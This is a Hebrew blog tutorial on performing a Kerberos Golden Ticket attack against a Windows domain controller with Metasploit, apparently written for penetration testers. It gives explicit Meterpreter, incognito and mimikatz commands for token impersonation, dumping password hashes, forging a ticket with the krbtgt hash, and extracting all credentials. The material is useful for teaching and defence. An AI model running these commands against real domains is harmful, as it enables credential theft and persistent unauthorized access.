Home אבטחת מידעPenetration Testing - Offense הסבר וביצוע Golden Ticket בDomain ע”י Metasploit

הסבר וביצוע Golden Ticket בDomain ע”י Metasploit

by Tal Ben Shushan 27/01/2018 0 comment
הסבר וביצוע Golden Ticket בDomain ע”י Metasploit
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

הסבר וביצוע Golden Ticket בDomain ע”י Metasploit


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit

Golden Ticket  הוא היכולת של התוקף לנצל את ה Hash של Kerberos, בהסבר כאן : הסבר על Kerberos

אם לא קראתם את המאמר על kerberos אסביר כאן בקצרה,

כאשר המשתמש מעוניין לגשת לשרת בארגון הוא פונה לkerberos עם ה TGT שלו על מנת לקבל “כרטיס” Ticket שאיתו יוכל לגשת לשרת
בכל הפעמים המשתמש תמיד פונה ל TGS שהוא ה KDC וKDC על ידי הסיסמא  ל krbtgt מצפין את הTicket, כך שהמשתמש לא יכול לפתוח את ההצפנה אלא רק הTGS וכל זה נעשה על ידי הסיסמא  של krbtgt

המטרה של Golden Ticket היא לקבל את ה Hash של krbtgt ולהשתמש בו בהתקפה על הארגון כל הזמן שנרצה ללא שימוש ביוזר שקיים והארגון עלול לגלות אותו.

הרגע שיש לנו את ה Hash של krbtgt , אנחנו תמיד יכולים לפנות ל TGS ולבקש כרטיס גישה לשירותים אחרים בדומיין, ברגע שה KDC מקבל כרטיס שהוצפן על ידי ה krbtgt הוא מאמין שהבקשה Valid

אז אך אנחנו מוצאים את ה krbtgt hash?

כיוון שהמשתמש krbtgt הוא משתמש היושב רק בDC רק על ידי השתלטות על DC נוכל לבצע את המהלך הזה.

דרוש:

1.Kali מותקן

2. Domain Controller – למשל שרת DC1

3. הצלחתם להתחבר על ידי Metasploit אל ה DC עם גישת Meterpreter

העבירו את השליטת Meterpreter לרקע, על ידי כך שתרשמו

meterpreter > background

או תלחצו על Ctrl + Z

כעת רשמו sessions על מנת לראות מה ה ID של ה Session וחזרו אליו

msf > sessions
msf > sessions 1

ונפעיל את kiwi – סט כלים לשימוש של Golden Ticket

meterpreter > use kiwi

נוכל להקליד shell על מנת להכינס לCMD ולבדוק באיזה דומיין אנחנו ועם מי אנחנו מחוברים

meterpreter > shell

כעת רשמו

C:\Users\administrator\Desktop> whoami /user

נוכל לראות את ה SID של המשתמש שאיתו אנחנו מחוברים, מה שחשוב להסתכל זה על היוזר 500, והוא תחת הדומיין tal שכן זה Domain Admin

כעת נבדוק את שם הדומיין ושאר הפרמטרים על ידי

C:\Users\administrator\Desktop> ipconfig /all

נהעביר את תהליך meterpreter  ל Proccess אחר (על מנת שיהיה לנו גישה ל חשבון ה System של המערכת)

meterpreter > ps

נוכל לעביר לתהליך למשל 440

meterpreter > migrate 440

*אם לא עובד, נסו להעביר לתהליך אחד שבהם אתם שולטים ואז לתהליך כמו lsass.exe

כעת נשתמש בהרשאות של מנהל המערכת

meterpreter > use incognito

כעת נבדוק אם המשתמש Admninistrator מחובר

meterpreter > list_tokens -u

ניתן לראות ברשימה שכן

Tal\Administrator

כעת “נתחזה” לו

impersonate_token tal\\administrator

כעת נפעיל סט כלים נוסף והוא mimikatz

meterpreter > use mimikatz

כעת נתחיל בתהליך ה Golden Ticket

רשמו

meterpreter > kerberos

כעת ניתן לראות את הסיסמא של Administrator בגלל שהשתמשנו בחשבון ה krbtgt על מנת להחזיר את הסיסמא של מנהל הארגון

כעת הקישו

meterpreter > mimikatz_command -f samdump:hashes

  • אם אתם בסביבת מעבדה וקיבלתם שגיאה, הזינו את הפקודה הבאה ב Powershell של ה DC

נוציא את ה Hash Dump

נעתיק את ה Hash של המשתמש krbtgt בלבד, מסומן בצהוב

כעת נחזור לרקע,

meterpreter > background
msf > use post/windows/escalate/golden_ticket

כעת נשתמש בפקודה

msf post(golden_ticket) > set KRBTGT_HASH 3c6f9669e8e54889b1f763481912890d
msf post(golden_ticket) > set session 1

ואז

msf post(golden_ticket) > exploit

ניתן לראות שהוא שמר את ה Golden Ticket בנתיב

כעת על מנת להשתמש בזה, יש לחזור ל meterpreter

meterpreter > use kiwi
meterpreter > kerberos_ticket_use /root/.msf4/loot/20..........bin

*כמובן שיש לשנות את הנתיב והקובץ למה שאתם שמרתם

ולאחר ה Enter ניתן לראות שה kerberos ticket applied

ניתן להקיש

meterpreter > kerberos_ticket_list

לראות את הkrbtgt שאנחנו משתמשים בו כעת

כעת נוכל לבצע אפשרויות כמו גילוי הסיסמה של המשתמשים

meterpreter > creds_all

או לגלות את ה SHA וה NTLM

האפשרויות שניתן לבצע ב kiwi = mimikatz

meterpreter > help kiwi

ניתן להתשמש גם בפקודות של Mimikatz

על ידי

meterpreter > load mimikatz

ולמשל

meterpreter > wdigest

מאמרים קשורים

Leave a Comment